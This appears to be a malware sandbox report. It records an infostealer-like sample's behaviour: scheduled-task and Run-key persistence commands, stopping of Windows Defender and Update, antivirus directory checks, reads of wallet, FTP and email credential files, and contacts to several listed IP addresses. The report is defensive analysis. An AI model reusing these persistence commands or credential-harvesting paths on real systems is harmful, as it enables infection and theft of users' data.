RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Uses Windows utilities for basic Windows functionality (8 events)

cmdline	schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2776 CREDAT:145409
cmdline	chcp 1251
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Connects to an IRC server, possibly part of a botnet

Communicates with host for which no DNS query was performed (9 events)

host	109.107.182.3
host	117.18.232.200
host	185.172.128.109
host	185.172.128.19
host	185.172.128.53
host	185.172.128.90
host	185.215.113.68
host	193.233.132.62
host	87.251.77.166

Attempts to identify installed AV products by installation directory (8 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web
file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService Jan. 23, 2024, 7:55 a.m.	service_handle: 0x0064c5d8 service_name: WinDefend control_code: 1		0	0
ControlService Jan. 23, 2024, 7:55 a.m.	service_handle: 0x0064c9e8 service_name: wuauserv control_code: 1		0	0

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (6 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131	reg_value	C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
cmdline	schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\n6P8X5rop5bCHCDpw23f.exe

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (1 event)

file	C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini

Collects information about installed applications (38 events)

Time & API	Arguments	Status
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExA Jan. 23, 2024, 7:55 a.m.	key_handle: 0x00000494 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\ICQ\0001
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (5 events)

process	face.exe	useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
process	iexplore.exe	useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
process	explorhe.exe	useragent
process	InstallSetup7.exe	useragent	NSIS_Inetc (Mozilla)
process	rty25.exe	useragent	HTTPREAD

Creates a slightly modified copy of itself (1 event)

description

Possibly a polymorphic version of itself

file

